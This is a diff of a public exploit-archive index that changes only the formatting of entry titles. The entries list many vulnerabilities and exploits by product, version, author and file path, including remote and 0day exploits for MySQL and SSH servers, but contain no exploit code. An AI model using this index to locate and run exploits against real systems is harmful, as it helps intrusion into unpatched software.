22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Root Exploit (2)",2003-07-16,nic,unix,local,0 22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 Settings.inc.PHP Path Disclosure Vulnerability",2003-07-17,Bosen,php,webapps,0 -22926,platforms/multiple/dos/22926.txt,"Witango Server 5.0.1 .061 Remote Cookie Buffer Overflow Vulnerability",2003-07-18,"Next Generation Software",multiple,dos,0 +22926,platforms/multiple/dos/22926.txt,"Witango Server 5.0.1 .061 - Remote Cookie Buffer Overflow Vulnerability",2003-07-18,"Next Generation Software",multiple,dos,0 22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 PATH_SIMPNEWS Remote File Include Vulnerability",2003-07-18,PUPET,php,webapps,0 22928,platforms/linux/local/22928.pl,"mcrypt <= 2.5.8 Stack Based Overflow",2012-11-26,Tosh,linux,local,0 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript PHP Code Injection Vulnerability",2012-11-26,d3b4g,php,webapps,0 @@ -20141,10 +20141,10 @@ id,file,description,date,author,platform,type,port 22935,platforms/multiple/dos/22935.txt,"Websense Proxy Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 22936,platforms/php/webapps/22936.txt,"SmartCMS (index.php, idx parameter) SQL Injection Vulnerability",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability",2012-11-26,LiquidWorm,php,webapps,0 -22938,platforms/linux/dos/22938.py,"mcrypt <= 2.6.8 stack-based buffer overflow PoC",2012-11-26,_ishikawa,linux,dos,0 +22938,platforms/linux/dos/22938.py,"mcrypt <= 2.6.8 stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113 .1_6 Queue-PR Database Command Line Option Buffer Overflow Vulnerability",2003-07-21,inv[at]dtors,unix,local,0 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 -22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal vulnerability",2003-07-21,gr00vy,php,webapps,0 +22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0 22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x Local File Include Information Disclosure Vulnerability",2003-07-21,noconflic,php,webapps,0 22943,platforms/linux/local/22943.c,"Top 1.x/2.0 Home Environment Variable Local Buffer Overflow Vulnerability",2003-07-22,UHAGr,linux,local,0 22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 CGITest.HTML Cross Site Scripting Vulnerability",2003-07-21,dr_insane,windows,remote,0 @@ -20153,7 +20153,7 @@ id,file,description,date,author,platform,type,port 22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 Administrative Interface Long Request Router DoS",2003-07-21,"David F.Madrid",hardware,dos,0 22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include Vulnerability",2003-07-21,"phil dunn",php,webapps,0 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow Vulnerability",2003-07-23,"Uffe Nielsen",netware,dos,0 -22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router 0 UPNP Long Request Denial of Service Vulnerability",2003-07-23,"David F. Madrid",hardware,dos,0 +22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service Vulnerability",2003-07-23,"David F. Madrid",hardware,dos,0 22951,platforms/windows/remote/22951.html,"Opera 7.20 Mail Client Policy Circumvention Vulnerability",2003-07-23,"Arve Bersvendsen",windows,remote,0 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 Unspecified Memory Disclosure Vulnerability",2003-07-23,V9,linux,dos,0 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 Information Disclosure Vulnerabilities",2003-07-24,"Jim Pangalos",php,webapps,0 @@ -20183,8 +20183,8 @@ id,file,description,date,author,platform,type,port 22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 UDP Echo Service Memory Disclosure Vulnerability",2003-08-01,FX,hardware,dos,0 22979,platforms/linux/local/22979.txt,"CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation Vulnerability",2003-08-01,"Secure Network Operations",linux,local,0 22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 Device Driver Memory Overwrite Vulnerability",2003-08-02,"Lord Yup",windows,local,0 -22981,platforms/linux/dos/22981.c,"Postfix 1.1.x Denial of Service Vulnerabilities (1)",2003-08-04,r3b00t,linux,dos,0 -22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x Denial of Service Vulnerabilities (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0 +22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service Vulnerabilities (1)",2003-08-04,r3b00t,linux,dos,0 +22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service Vulnerabilities (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0 22983,platforms/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 Format String Vulnerability",2003-08-04,mcw@wcd.se,hardware,dos,0 22984,platforms/linux/local/22984.c,"Xtokkaetama 1.0 b-6 Nickname Local Buffer Overflow Vulnerability (1)",2003-08-04,V9,linux,local,0 22985,platforms/linux/local/22985.c,"Xtokkaetama 1.0 b-6 Nickname Local Buffer Overflow Vulnerability (2)",2003-08-04,techieone@softhome.net,linux,local,0 @@ -20213,7 +20213,7 @@ id,file,description,date,author,platform,type,port 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection Vulnerability",2003-08-11,G00db0y,php,webapps,0 23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder Remote Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 -23011,platforms/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x Cross-Site Scripting Vulnerability",2003-08-11,G00db0y,php,webapps,0 +23011,platforms/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting Vulnerability",2003-08-11,G00db0y,php,webapps,0 23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 Path Disclosure Vulnerability",2003-08-11,G00db0y,php,webapps,0 23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module SQL Injection Vulnerabilities",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module day Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -20222,7 +20222,7 @@ id,file,description,date,author,platform,type,port 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0 23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0 -23020,platforms/php/webapps/23020.txt,"HostAdmin 0 Path Disclosure Vulnerability",2003-08-12,G00db0y,php,webapps,0 +23020,platforms/php/webapps/23020.txt,"HostAdmin - Path Disclosure Vulnerability",2003-08-12,G00db0y,php,webapps,0 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 Search Cross-Site Scripting Vulnerability",2003-08-12,"Donnie Werner",cgi,webapps,0 23022,platforms/php/local/23022.c,"PHP 4.x DLOpen Memory Disclosure Vulnerability (1)",2003-08-13,"Andrew Griffiths",php,local,0 23023,platforms/php/local/23023.c,"PHP 4.x DLOpen Memory Disclosure Vulnerability (2)",2003-08-13,andrewg,php,local,0 @@ -20243,7 +20243,7 @@ id,file,description,date,author,platform,type,port 23039,platforms/php/webapps/23039.txt,"Fusion News 3.3 Unauthorized Account Addition Vulnerability",2003-08-18,DarkKnight,php,webapps,0 23040,platforms/windows/remote/23040.c,"eMule 0.2x AttachToAlreadyKnown Double Free Vulnerability",2003-09-01,"Stefan Esser",windows,remote,0 23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 Password Disclosure Vulnerability",2003-08-19,"cyber talon",windows,local,0 -23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 Remote Denial of Service Vulnerability",2003-08-20,"real Remoter",windows,dos,0 +23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service Vulnerability",2003-08-20,"real Remoter",windows,dos,0 23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 SMIL File Script Execution Vulnerability",2003-08-19,KrazySnake,windows,remote,0 23044,platforms/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 Object Type Validation Vulnerability",2003-08-20,"Drew Copley",windows,remote,0 23045,platforms/linux/dos/23045.pl,"ViRobot Linux Server 2.0 - Local Vulnerabilities",2003-08-20,kf,linux,dos,0 @@ -20258,7 +20258,7 @@ id,file,description,date,author,platform,type,port 23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Root Compromise Vulnerability",2003-08-23,kf,linux,remote,0 23055,platforms/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta HTML Injection Vulnerability",2003-08-23,"Scott M",asp,webapps,0 23056,platforms/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service Attack",2003-08-25,"Luca Ercoli",windows,dos,0 -23057,platforms/php/webapps/23057.txt,"newsPHP 216 Remote File Include Vulnerability",2003-08-25,Officerrr,php,webapps,0 +23057,platforms/php/webapps/23057.txt,"newsPHP 216 - Remote File Include Vulnerability",2003-08-25,Officerrr,php,webapps,0 23058,platforms/php/webapps/23058.txt,"newsPHP 216 Authentication Bypass Vulnerability",2003-08-25,Officerrr,php,webapps,0 23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability",2003-08-25,"cyber talon",cgi,webapps,0 23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x Secure.PHP Unauthorized Access Vulnerability",2003-08-26,frog,php,webapps,0 @@ -20269,9 +20269,9 @@ id,file,description,date,author,platform,type,port 23065,platforms/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x LNG Parameter Cross-Site Scripting Vulnerability",2003-08-27,"Bahaa Naamneh",php,webapps,0 23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun Vulnerability",2003-08-27,storm,windows,remote,0 23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 Mod Parameter Cross-Site Scripting Vulnerability",2003-08-27,"Bahaa Naamneh",php,webapps,0 -23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal file disclosure vulnerability",2003-08-30,sickle,windows,remote,0 +23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal file disclosure Vulnerability",2003-08-30,sickle,windows,remote,0 23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Information Disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 -23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal file disclosure vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 +23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal file disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Cross Site Scripting Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard 'invitefriends.php3' Cross Site Scripting Vulnerability",2003-09-01,"David F. Madrid",php,webapps,0 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)",2012-12-02,kingcope,windows,remote,0 @@ -20284,7 +20284,7 @@ id,file,description,date,author,platform,type,port 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass Exploit (0day)",2012-12-02,kingcope,windows,remote,0 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Preauth User Enumeration (0day)",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"SSH.com Communications SSH Tectia Authentication Bypass Remote Exploit (0day)",2012-12-02,kingcope,linux,remote,0 -23083,platforms/windows/remote/23083.txt,"MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day",2012-12-02,kingcope,windows,remote,0 +23083,platforms/windows/remote/23083.txt,"MySQL Windows Remote System Level Exploit (Stuxnet technique) (0day)",2012-12-02,kingcope,windows,remote,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 Message Field HTML Injection Vulnerability",2003-09-01,Trash-80,php,webapps,0 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 'sitebuilder.cgi' Directory Traversal File Disclosure Vulnerability",2003-09-01,"Zero X",cgi,webapps,0 23086,platforms/windows/dos/23086.txt,"Yahoo! Messenger 4.0/5.0 - Remote Denial of Service Vulnerability",2003-09-01,diman,windows,dos,0 @@ -20300,7 +20300,7 @@ id,file,description,date,author,platform,type,port 23096,platforms/windows/local/23096.txt,"Microsoft WordPerfect Converter Buffer Overrun Vulnerability",2003-09-03,valgasu,windows,local,0 23097,platforms/php/webapps/23097.txt,"WebCalendar 0.9.x colors.php color XSS",2003-09-03,noconflic,php,webapps,0 23098,platforms/php/webapps/23098.txt,"WebCalendar 0.9.x week.php user XSS",2003-09-03,noconflic,php,webapps,0 -23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x Multiple Module SQL Injection Vulnerabilities",2003-09-03,noconflic,php,webapps,0 +23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - Multiple Module SQL Injection Vulnerabilities",2003-09-03,noconflic,php,webapps,0 23100,platforms/windows/remote/23100.c,"Ipswitch WS_FTP Server 3.4/4.0 FTP Command Buffer Overrun Vulnerabilities",2003-09-04,xfocus,windows,remote,0 23101,platforms/windows/dos/23101.c,"Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability",2003-09-04,WARL0RD,windows,dos,0 23102,platforms/windows/dos/23102.pl,"FoxWeb 2.5 PATH_INFO Remote Buffer Overrun Vulnerability",2003-06-27,pokleyzz,windows,dos,0 @@ -20308,7 +20308,7 @@ id,file,description,date,author,platform,type,port 23105,platforms/php/webapps/23105.txt,"myBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0 23106,platforms/php/webapps/23106.txt,"SchoolCMS Persistent XSS",2012-12-03,VipVince,php,webapps,0 23107,platforms/windows/dos/23107.txt,"Opera Web Browser 12.11 Crash PoC",2012-12-03,coolkaveh,windows,dos,0 -23109,platforms/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 CSRF Vulnerability",2012-12-03,"Ben Williams",multiple,webapps,0 +23109,platforms/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - CSRF Vulnerability",2012-12-03,"Ben Williams",multiple,webapps,0 23110,platforms/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 Arbitrary File Download",2012-12-03,"Ben Williams",linux,webapps,0 23111,platforms/multiple/webapps/23111.txt,"FirePass SSL VPN Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",multiple,webapps,0 23112,platforms/linux/dos/23112.txt,"IBM DB2 db2dart Buffer Overflow Vulnerability",2003-09-18,"Martinez Kuhn",linux,dos,0 @@ -20331,23 +20331,23 @@ id,file,description,date,author,platform,type,port 23129,platforms/php/webapps/23129.txt,"Invision Power Board 1.x Index.php Showtopic Cross-Site Scripting Vulnerability",2003-09-09,"Boy Bear",php,webapps,0 23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 WWW.exe Denial of Service Vulnerability",2003-09-10,"Phuong Nguyen",windows,dos,0 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 -23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal 0day",2012-12-04,Nin3,windows,webapps,0 +23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal (0day)",2012-12-04,Nin3,windows,webapps,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 -23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal vulnerability",2003-09-10,dr_insane,multiple,remote,0 +23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal Vulnerability",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy Vulnerability",2003-09-10,"Tim Kennedy",multiple,remote,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x Password Handler Buffer Overflow Vulnerability",2003-09-10,"Frank DENIS",linux,dos,0 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x cgi-lib.dll Remote Buffer Overflow Vulnerability",2003-09-12,Moran,windows,dos,0 23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 Authentication SQL Injection Vulnerability",2003-09-12,frog,php,webapps,0 -23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x 'mana' REMOTE_ADDR Authentication Bypass Vulnerability",2003-09-15,Texonet,sco,local,0 +23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass Vulnerability",2003-09-15,Texonet,sco,local,0 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 HTTP Request Buffer Overflow Vulnerability",2003-09-15,"Bahaa Naamneh",multiple,dos,0 -23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x 'mana' PATH_INFO Privilege Escalation Vulnerability",2003-09-15,Texonet,sco,local,0 -23144,platforms/windows/remote/23144.txt,"minihttp file-sharing for net 1.5 - Directory Traversal vulnerability",2003-09-15,Winter-Smith,windows,remote,0 +23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation Vulnerability",2003-09-15,Texonet,sco,local,0 +23144,platforms/windows/remote/23144.txt,"minihttp file-sharing for net 1.5 - Directory Traversal Vulnerability",2003-09-15,Winter-Smith,windows,remote,0 23145,platforms/windows/dos/23145.c,"Ipswitch Imail Server 5.0 SMTP HELO Argument Buffer Overflow Vulnerability",1998-03-10,Rootshell,windows,dos,0 23146,platforms/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 SMTP HELO Argument Buffer Overflow Vulnerability",1999-03-10,Rootshell,windows,dos,0 23147,platforms/windows/remote/23147.txt,"Nokia Electronic Documentation 5.0 Directory Disclosure Vulnerability",2003-09-15,@stake,windows,remote,0 23148,platforms/windows/remote/23148.txt,"Nokia Electronic Documentation 5.0 Connection Redirection Vulnerability",2003-09-15,@stake,windows,remote,0 23149,platforms/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 Cross-Site Scripting Vulnerability",2003-09-15,"Ollie Whitehouse",windows,remote,0 -23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 Remote Denial of Service Attack",2003-09-15,D4rkGr3y,windows,dos,0 +23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service Attack",2003-09-15,D4rkGr3y,windows,dos,0 23151,platforms/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 HOME Environment Variable Buffer Overflow Vulnerability",2003-09-16,"Angelo Rosiello",linux,remote,0 23152,platforms/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0 .0.107 Buffer Overrun Vulnerability",2003-09-16,cesaro,windows,remote,0 23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i Cross-Site Scripting Vulnerability",2003-09-16,dr_insane,cgi,webapps,0 @@ -20358,8 +20358,8 @@ id,file,description,date,author,platform,type,port 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 -23161,platforms/linux/remote/23161.c,"LSH 1.x Remote Buffer Overflow Vulnerability (1)",2003-09-19,"Carl Livitt",linux,remote,0 -23162,platforms/linux/remote/23162.c,"LSH 1.x Remote Buffer Overflow Vulnerability (2)",2003-09-19,"m00 security",linux,remote,0 +23161,platforms/linux/remote/23161.c,"LSH 1.x - Remote Buffer Overflow Vulnerability (1)",2003-09-19,"Carl Livitt",linux,remote,0 +23162,platforms/linux/remote/23162.c,"LSH 1.x - Remote Buffer Overflow Vulnerability (2)",2003-09-19,"m00 security",linux,remote,0 23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager sql_id Information Disclosure Vulnerability",2003-09-19,"H Zero Seven",php,webapps,0 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 auth.inc.php SQL Injection Vulnerability",2003-09-20,"Lifo Fifo",php,webapps,0 23165,platforms/windows/dos/23165.txt,"Sun Java 1.x XML Document Nested Entity Denial of Service Vulnerability",2003-09-22,"Sun Microsystems",windows,dos,0 @@ -20368,7 +20368,7 @@ id,file,description,date,author,platform,type,port 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 Local Compression Program Privilege Elevation Vulnerability",2003-09-22,"Sebastian Krahmer",linux,local,0 23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 Login Remote Denial of Service Vulnerability",2003-09-23,"Moran Zavdi",windows,dos,0 23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0 -23171,platforms/linux/remote/23171.c,"MPG123 0.59 Remote File Play Heap Corruption Vulnerability",2003-09-23,V9,linux,remote,0 +23171,platforms/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption Vulnerability",2003-09-23,V9,linux,remote,0 23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 SQL-GW Connection Denial of Service Vulnerability",2003-09-24,"Oliver Heinz and Thomas Neuderth",linux,dos,0 23173,platforms/multiple/remote/23173.txt,"TCLhttpd 3.4.2 Directory Listing Disclosure Vulnerability",2003-09-24,"Phuong Nguyen",multiple,remote,0 23174,platforms/multiple/remote/23174.txt,"TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2003-09-24,"Phuong Nguyen",multiple,remote,0 @@ -20377,12 +20377,12 @@ id,file,description,date,author,platform,type,port 23177,platforms/windows/dos/23177.txt,"NVIDIA Install Application 2.1002.85.551 (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",2012-12-06,metasploit,multiple,remote,0 23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows MOF Execution",2012-12-06,metasploit,windows,remote,0 -23180,platforms/php/webapps/23180.txt,"Kordil EDMS 2.2.60rc3 - SQL Injection Vulnerability",2012-12-06,"Woody Hughes",php,webapps,0 +23180,platforms/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection Vulnerability",2012-12-06,"Woody Hughes",php,webapps,0 23181,platforms/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service Vulnerability",2003-09-24,"Luigi Auriemma",multiple,dos,0 23182,platforms/linux/remote/23182.c,"CFEngine 2.0.x CFServD Transaction Packet Buffer Overrun Vulnerability (1)",2003-09-25,jsk,linux,remote,0 23183,platforms/linux/remote/23183.c,"CFEngine 2.0.x CFServD Transaction Packet Buffer Overrun Vulnerability (2)",2003-11-04,snooq,linux,remote,0 23184,platforms/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 Sensitive User Information Storage Vulnerability",2003-09-25,"Phuong Nguyen",windows,webapps,0 -23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal vulnerability",2003-09-25,"Phuong Nguyen",windows,remote,0 +23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal Vulnerability",2003-09-25,"Phuong Nguyen",windows,remote,0 23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 Streaming ASX Header Parsing Buffer Overrun Vulnerability",2003-09-25,"Otero Hernan",linux,remote,0 23187,platforms/cgi/remote/23187.txt,"SBox 1.0.4 Path Disclosure Vulnerability",2003-09-25,"Julio e2fsck Cesar",cgi,remote,0 23188,platforms/linux/remote/23188.c,"Athttpd 0.4 b Remote GET Request Buffer Overrun Vulnerability",2003-09-25,r-code,linux,remote,0 @@ -20391,7 +20391,7 @@ id,file,description,date,author,platform,type,port 23191,platforms/windows/dos/23191.txt,"Savant Web Server 3.1 Page Redirect Denial of Service Vulnerability",2003-09-26,"Phuong Nguyen",windows,dos,0 23192,platforms/php/webapps/23192.txt,"GuppY 2.4 HTML Injection Vulnerability",2003-09-29,"David Suzanne",php,webapps,0 23193,platforms/php/webapps/23193.txt,"Geeklog 1.3.x SQL injection",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23194,platforms/php/webapps/23194.txt,"Geeklog 1.3.x XSS",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23194,platforms/php/webapps/23194.txt,"Geeklog 1.3.x - XSS",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 MSG Cross-Site Scripting Vulnerability",2003-09-29,G00db0y,asp,webapps,0 23196,platforms/linux/remote/23196.c,"WebFS 1.x Long Pathname Buffer Overrun Vulnerability",2003-09-29,jsk,linux,remote,0 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow Vulnerability",2003-09-29,jsk,linux,local,0 @@ -20399,14 +20399,14 @@ id,file,description,date,author,platform,type,port 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 (.swf) - Crash PoC",2012-12-07,coolkaveh,windows,dos,0 -23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 +23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 23203,platforms/windows/remote/23203.rb,"IBM System Director Agent DLL Injection",2012-12-07,metasploit,windows,remote,0 23204,platforms/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun Vulnerability",2003-09-30,demz,linux,local,0 23205,platforms/php/webapps/23205.txt,"DCP-Portal 5.5 advertiser.php password Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23206,platforms/php/webapps/23206.txt,"DCP-Portal 5.5 lostpassword.php email Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23207,platforms/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 search Cross-Site Scripting Vulnerability",2003-10-01,Ezhilan,php,webapps,0 -23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1 .0.18 - Directory Traversal information disclosure vulnerability",2003-10-01,"Gama Sec",php,webapps,0 -23209,platforms/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal vulnerability",2003-10-01,"GamaSec Security",windows,remote,0 +23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1 .0.18 - Directory Traversal information disclosure Vulnerability",2003-10-01,"Gama Sec",php,webapps,0 +23209,platforms/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal Vulnerability",2003-10-01,"GamaSec Security",windows,remote,0 23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 Search Service Remote File Deletion 